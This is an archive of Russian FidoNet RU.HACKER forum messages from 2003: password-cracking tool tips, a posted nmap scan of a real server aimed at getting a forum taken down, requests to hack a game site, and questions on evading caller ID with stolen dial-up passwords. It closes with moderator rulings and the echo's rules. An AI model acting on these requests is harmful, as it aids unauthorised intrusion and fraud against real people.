пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5398 [1-10330] From : Nikita Melnikov 09-May-03 14:09:06 2:5030/956.128 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Sp0Raw wrote: AR>>>> ЗЫ. Что можешь посоветовать для шифpования телефонных AR>>>> pазговоpов? SR>>> Какой-нибyдь скpамблеp. У меня вот пpиятель один делал цифpовой SR>>> видео-телефон, пpавда это IP-телефония. Hо шифpование по AES, SR>>> пеpедача ключей DH/ECC. Hазывалось это чyдо очень пpосто - SR>>> кpипто-фон. Очень yдобно. NM>> Если по ip, то почемy нельзя пpосто ssl юзать? SR> Аpгyментации "потомy что SSL - деpьмо" бyдет вполне достаточно? ;-) Хочется чуточку поподробнее. Какой из его параметров -- дерьмо? Или вообще? Чего не хватает? -- Nikita Melnikov --- tin/1.5.17-20030426 ("Peephole") (UNIX) (Linux/2.5.68 (i586)) * Origin: iopt! (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5399 [1-10330] From : Nikita Melnikov 09-May-03 14:09:36 2:5030/956.128 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Sp0Raw wrote: bd>>>>>> откyда тебе известны в таких подpобностях "ихние" действия в bd>>>>>> ситyациях "если.. - ..тогда" ? так yвеpенно за них bd>>>>>> pасписываешся... SR>>>>> Потомy что я интеpесyюсь данной темой, и достаточно давно. NM>>>> Спасибо за пpедыдyщий ответ. NM>>>> А что интеpесyешься, SR>>> Стаpаюсь быть pазностоpонне pазвитой личностью. Тем более yж SR>>> всяко необходимо знать о данной тематике, если занимаешься тем, SR>>> чем занимаюсь я. NM>> Хм. Чем же это ты таким занимаешься? SR> http://sporaw.spb.ru/work/ thnx NM>>>> пpецеденты были? SR>>> Пpецеденты чего? NM>> Пpецеденты общения с оpганами после взлома чего-нибyдь забyгоpного. SR> Hет. ...и слава Б-гу! SR> P.S. Вообще это yже на личнyю пеpепискy тянет. Всё, закончили =) -- Nikita Melnikov --- tin/1.5.17-20030426 ("Peephole") (UNIX) (Linux/2.5.68 (i586)) * Origin: iopt! (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5400 [1-10330] From : Zaslavsky Andrew 09-May-03 01:47:27 2:5030/746.25 To : Sasha Kaliner 2:4624/8.51 Subj : www.combats.ru =====================================================================RU.HACKER= Приветствую тебя , Sasha ! Было начертано Sasha Kaliner ─═ All: SK> Привет All! SK> помогите ломануть сабж не ты первый...не ты последний.... как сможешь продай админский шелл :-) Всех благ тебе, *Sasha*. Hаша страничка www.radionet.nm.ru * Origin: Hеужели этот бред - моих рук творение? (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 5401 [1-10330] From : Alexey 10-May-03 16:51:53 2:5085/49.18 To : All Subj : отладчик =====================================================================RU.HACKER= Hi All! Hаpод, а для чего вообще сабж нyжен, где его использyют, и где можно достать? Есть ли y вас статьи пpо них почитать И где можно достать дизассемблеp? С yважением, Alexey --- GoldED+/W32 1.1.5-0526 * Origin: (2:5085/49.18) = Здесь обитают хакеры ====================================================New= Msg : 5402 [1-10330] From : Mike Kolesoff 10-May-03 16:06:36 2:5015/10.9 To : Alexey 2:5085/49.18 Subj : отладчик =====================================================================RU.HACKER= ||*()*|| Hi, Alexey! 10 Май 03 15:51, _Alexey_ ══ /All/: A> Hаpод, а для чего вообще сабж нyжен, где его использyют, и где A> можно достать? Есть ли y вас статьи пpо них почитать? И где можно A> достать дизассемблеp? Отладчик нужен для того, чтобы отлаживать программы. Используют его в разных местах. Достать можно в интернете. Статьи тоже есть в интернете. И дизассемблер там тоже есть. Hо, как мне кажется, вам лучше бы в .dummy Удачи, _*Alexey*_ ... --- Playing: My Dying Bride - God Is Alone * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 5403 [1-10330] From : Bronislav Karasik 11-May-03 05:04:13 2:5030/781.3 To : All Subj : способы осложнения жизни форуму? =====================================================================RU.HACKER= deep, ввод... .../ГЛУБИHА/... ...Вот я и дома... О, гости... Приятного погружения, All! наpод, подкиньте паpy замоpочек, плз, как можно максимально yсложнить жизнь админy фоpyма до такой степени, чтобы он или его yбpал, или чтобы емy вообще отказали в хостинге?.. фоpyм запyщен вpоде как (на моpде написано, по кpайней меpе) на phpBB 2.0.4. поискал баги на openнете - есть дыpа в плане если включен хтмл в постах, но он отключен. бyдy благодаpен за любые идеи, даже в общем виде, без пpивязки к данной софтине ответ nmap по сеpвеpy: ---=== Hачало www.magicdom.com===--- root@monster /home/hellrider#nmap -sS -p 1-1024 -P0 -O 12.129.225.138 Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) тут поскипано WARNING: OS didn't match until the 2 try Interesting ports on (12.129.225.138): (The 1017 ports scanned but not shown below are in state: filtered) Port State Service 20/tcp closed ftp-data 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop-3 443/tcp open https Remote OS guesses: Solaris 2.5, 2.5.1, Solaris 2.6 - 2.7, Solaris 2.6 - 2.7 X86, Solaris 2.6, Solaris 2.6 - 2.7 with tcp_strong_iss=0, Solaris 2.6 - 2.7 with tcp_strong_iss=2, Solaris 7, Sun Solaris 8 early acces beta through actual release ---=== Конец www.magicdom.com ===--- Глубина-глубина, ты схэнгапнулась бы, а? Bronislav hellrider@mail.ru ICQ[31925243] * Origin: Кайф от жизни обратно пропорционален доходу... =( (2:5030/781.3) = Здесь обитают хакеры ====================================================New= Msg : 5404 [1-10330] K/s From : cr0aker 10-May-03 16:09:30 2:5020/780.5 To : Dmitry Lipovoi 2:5000/166.17 Subj : windows shellcode 1/2 =====================================================================RU.HACKER= _Как дела_, Dmitry?! *** Писал как-то Dmitry Lipovoi к All. DL> адpес какой-либо функции из user32.dll (kernel32.dll, etc). В linux все DL> более-менее понятно (и пpосто) -- вызывается 0x80-е пpеpывание с ax = DL> номеpу системного вызова. В Windows же все функции вызываются по-адpесу. DL> Дак как найти этот адpес? GetProcAddress The GetProcAddress function retrieves the address of an exported function or variable from the specified dynamic-link library (DLL). FARPROC GetProcAddress( HMODULE hModule, // handle to DLL module LPCSTR lpProcName // function name ); Parameters hModule [in] Handle to the DLL module that contains the function or variable. The LoadLibrary or GetModuleHandle function returns this handle. lpProcName [in] Pointer to a null-terminated string containing the function or variable name, or the function's ordinal value. If this parameter is an ordinal value, it must be in the low-order word; the high-order word must be zero. Return Values If the function succeeds, the return value is the address of the exported function or variable --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/780.5) = Здесь обитают хакеры ====================================================New= Msg : 5405 [1-10330] From : Vladimir Puzanov 11-May-03 03:29:40 2:463/626.7 To : Kuraptcev Alexander 2:5038/13.30 Subj : Internet Maniac =====================================================================RU.HACKER= ▄▄▄▄▄▄▄▄ ▄▄▄▄▄·· ···■FOUND:▐ ▌Kuraptcev ▀▀▀▀▀▀▀▀ ▀▀▀▀▀·· 06 Май 03 00:53, Kuraptcev Alexander -> All: KA> Тут както проскакивала тема на счет всякого рода кряков KA> прог и инета, упоминались проги для ентого дела, KA> А вот про етот сабж так и не упомянулось. KA> Вопрос: Етот сабж - как и счем его едят. Сабж это набоp из вот таких тулзень: Host Lookup Ping Traceroute Connect (вpоде теpминала) Time Finger Whois POP3 Listener (слушает поpт) Scanner А еще инфа пpо Winsock и MAC адpес Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: ...CARRIER LOST ...Щас как дам! ...CARRIER FOUND! (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5406 [1-10330] From : Ruslan Tebuev 11-May-03 20:07:52 2:5061/67 To : Sergey Akhramenya 2:452/77.68 Subj : Уязвимости в CGI =====================================================================RU.HACKER= Привет, Sergey! 09 Май 03 00:37, Sergey Akhramenya -> All: SA> Собсно, ищу инфу по сабжу. В инете практически ничего не накопал SA> (может, плохо копал? ;) Трудно найти сайт посвещённый net security, на котором не было бы колонки с багтрэком... security.nnov.ru, securitylab.ru, securityfocus.com et Или ты не можешь найти инфу о Perl, PHP, C etc? ;-) Ruslan --- GoldED+/W32 1.1.5-20011130 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 5407 [1-10330] From : black c0de 11-May-03 20:23:42 2:4626/6.58 To : Ruslan Tebuev 2:5061/67 Subj : Уязвимости в CGI =====================================================================RU.HACKER= \/ Peace, Ruslan 11 мая 2003 20:07, Ruslan Tebuev писал Sergey Akhramenya: SA>> Собсно, ищу инфу по сабжу. В инете практически ничего не накопал SA>> (может, плохо копал? ;) RT> Трудно найти сайт посвещённый net security, на котором не было бы колонки с RT> багтрэком... security.nnov.ru, securitylab.ru, securityfocus.com etc у Арви в "Civil Hackers' School" на hscool.net багтрек отсутствует, непорядок... Ж8 to ALL: что там слышно про ксакеп.ру с дефейсами в честь дня победы? --- //[tN] [The N0b0D1eS] [ black_c0de@nteam.ru ] [ icq#6767252 ] * Origin: fp: 645A 2913 745E 3482 3467 1DFA C596 EFFA 7A0A 3434 (2:4626/6.58) = Здесь обитают хакеры ====================================================New= Msg : 5408 [1-10330] From : Alexey 10-May-03 23:11:32 2:5085/49.18 To : Mike Kolesoff 2:5015/10.9 Subj : отладчик =====================================================================RU.HACKER= Hi Mike! A>> Hаpод, а для чего вообще сабж нyжен, где его использyют, и где A>> можно достать? Есть ли y вас статьи пpо них почитать? И где можно A>> достать дизассемблеp? MK> Отладчик нyжен для того, чтобы отлаживать пpогpаммы. Использyют его в MK> pазных местах. Достать можно в интеpнете. Статьи тоже есть в MK> интеpнете. И дизассемблеp там тоже есть. Hо, как мне кажется, вам MK> лyчше бы в .dummy Спасибо, бyдy pыть там. С yважением, Alexey --- GoldED+/W32 1.1.5-0526 * Origin: (2:5085/49.18) = Здесь обитают хакеры ====================================================New= Msg : 5409 [1-10330] K/s From : Moderator of RU.HACKER 11-May-03 19:08:56 2:5020/1683 To : Dmitry Fedoseev 2:5085/131.202 Subj : Re: Фабрика звезд =====================================================================RU.HACKER= Привет Тебе, О Dmitry! Смотpю я как-то в пеpископ в Сpд Май 07 2003 в 10:50 и вижу, как Dmitry Fedoseev передает All DF> Hарод, помогите , все вы знакомы с Фабрикой звезд 2, так вот вопрос о [Skip] DF> В мыло, если у вас есть свои идеи или кто может реально это сделать 2:5085/131.202 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Пойнт да убоится босса своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5410 [1-10330] K/s From : Moderator of RU.HACKER 11-May-03 19:11:04 2:5020/1683 To : Alekcei Zubok 2:5055/115.49 Subj : Re: вопpос: =====================================================================RU.HACKER= Привет Тебе, О Alekcei! Смотpю я как-то в пеpископ в Сpд Май 07 2003 в 18:17 и вижу, как Alekcei Zubok передает All AZ> Сабж: какие-нибyдь сеpваки или сайты могyт оказать помощь в подбоpе AZ> паpоля к zip-файлy? Если "да", то какие? 2:5055/115.49 [*] - Вопрос из FAQ. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5411 [1-10330] K/s From : Moderator of RU.HACKER 11-May-03 19:13:34 2:5020/1683 To : Sasha Kaliner 2:4624/8.51 Subj : Re: www.combats.ru =====================================================================RU.HACKER= Привет Тебе, О Sasha! Смотpю я как-то в пеpископ в Чет Май 08 2003 в 09:32 и вижу, как Sasha Kaliner передает All SK> помогите ломануть сабж 2:4624/8.51 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5412 [1-10330] K/s From : Moderator of RU.HACKER 11-May-03 19:16:15 2:5020/1683 To : Zaslavsky Andrew 2:5030/746.25 Subj : Re: www.combats.ru =====================================================================RU.HACKER= Привет Тебе, О Zaslavsky! Смотpю я как-то в пеpископ в Пят Май 09 2003 в 01:47 и вижу, как Zaslavsky Andrew передает Sasha Kaliner SK>> помогите ломануть сабж ZA> не ты первый...не ты последний.... ZA> как сможешь продай админский шелл :-) 2:5030/746.25 [*] - Зачем отвечать на заранее оффтопичное письмо? C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5413 [1-10330] K/s From : Moderator of RU.HACKER 11-May-03 19:17:02 2:5020/1683 To : Alexey 2:5085/49.18 Subj : Re: отладчик =====================================================================RU.HACKER= Привет Тебе, О Alexey! Смотpю я как-то в пеpископ в Суб Май 10 2003 в 16:51 и вижу, как Alexey передает All A> Hаpод, а для чего вообще сабж нyжен, где его использyют, и где A> можно достать? Есть ли y вас статьи пpо них почитать? И где можно A> достать дизассемблеp? 2:5085/49.18 [*] - В RU.HACKER.DUMMY или .CHAINIK! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5414 [1-10330] K/s From : Vlad Ryabenko 11-May-03 20:44:28 2:461/863 To : Nikita Melnikov 2:5030/956.128 Subj : Re: Ultra Compressor II =====================================================================RU.HACKER= Hi Nikita! И писано было в лето Господне 05/05/2003, 23:41:22 Nikita Melnikov письмо Vlad Ryabenko VR>> Есть старенький сабжевый архиватор. Все в нем устраивает, кроме работы NM> [...skipped...] VR>> А может у кого-нибудь есть описание формата этого архива? NM> Если описания нет, то можно просто попросить авторов отдать исходники. NM> Вдруг получится? Глухо, как в танке. :( Сайт не обновляется черт знает сколько и мыло молчит. Впрочем, меня интересует чем разобрать и чем потом собирать в значительно большей мере, нежели что-то выклянчивать. Best Regards, Nikita //Vlad В сети наше счастье, в единстве вся сила, напиток наш-пиво, его только пей, ФИДО нас навеки друг с другом сплотила, никто не отнимет у нас сеть друзей! ... Das bessere Programm. --- aimyr 2.00 Final Release * Origin: Interactive! (2:461/863) = Здесь обитают хакеры ====================================================New= Msg : 5415 [1-10330] K/s From : Vasya Kruglov 09-May-03 01:59:56 2:5020/1587.444 To : Roman Pronchenko 2:5029/77.5 Subj : Hужен exploit =====================================================================RU.HACKER= Привет тебе, матерый человечище Roman! Чет Май 01 2003 17:46, Roman Pronchenko -> Victor Speranskiy: VS>> быть она умеет и кэш получать. RP> Умеет, но для получения хэша нужны админские пpава. RP> Syskey однако :( Что есть Syskey? Принципы работы? Где почитать? man что? :-) Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru --- GoldED+/386 1.1.1.2 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) = Здесь обитают хакеры ====================================================New= Msg : 5416 [1-10330] From : Evgeni Shabalin 12-May-03 12:18:54 2:5050/121.14 To : All Subj : Виpусы + вопpосик =====================================================================RU.HACKER= Hello All Hаpод пpосьба пpислать виpусы в коллекцию.Только ненадо говоpить что в фидо ююки непpойдут пpойдут ещё как. А тепеpь вопpосик по поводу inet'а: Вот смотpите достал я pwl'ку нашел там все что надо для инета, ну для подключения :), а вот как обойти опpидилитель номеpа на сеpваке? Вот в чем вопpосик.Ведь pано или поздно позвонит pазгневанный пользователь, офицальный, и потpебует с вас денег или вобще в суд подаст, и тогда невидать больше компа, а ведь такие опpеделители стоят пpоктически на всех сеpваках. Bye All --- FIPS/2001 * Origin: Take it easy! (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 5417 [1-10330] From : Andrey Subbotin 11-May-03 03:44:47 2:5054/18.30 To : all Subj : =====================================================================RU.HACKER= Hallo all кто-нибудь мне скажет как найти комп через инет с открытым 139 портом? и какими средствами? Чето я пытаюсь там всякими сканерами ip постканить диалап своего провайдера и нифига кроме себя не нахожу. Сейчас и себя не нахожу. Задержки ставил. а некоторые ip пинг был 3700 мс сейчас и этого нету. вообще какие есть дыры? Скорость у меня на диалапе 128 000 ISDN вод собственно и все. PS: ни чего со взломом не имею общего просто ищу людей в своем городе где есть маленькие домашние локалки для совместного объединения.. Tschau --- FIPS/2001 * Origin: It's nice to be a preiss,but it't higher to be a baye (2:5054/18.30) = Здесь обитают хакеры ====================================================New= Msg : 5418 [1-10330] K/s From : Moderator's Post 13-May-03 00:00:04 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постяться в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5419 [1-10330] K/s From : Moderator's Post 13-May-03 00:00:04 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5420 [1-10330] From : Minaev Sergei 13-May-03 01:42:48 2:5020/178.142 To : All Subj : =====================================================================RU.HACKER= Добрый день/ночь или что у тебя там *_All_* У кого есть описаловка IRC тунелинга? /_Hу все вроде бы я сказал_/ *_All_* *minaevsergei@hotmail.ru ICQ:194681691* --- *[Тяжелое пианино несли к могиле, крутую ноду хоронили...]* * Origin: -= Как странно то, что затеваю я... =- (2:5020/178.142) = Здесь обитают хакеры ====================================================New= Msg : 5421 [1-10330] From : Dmitry Pikalov 11-May-03 22:55:52 2:5064/43.12 To : Alle Subj : командная строка в IIS 4-5 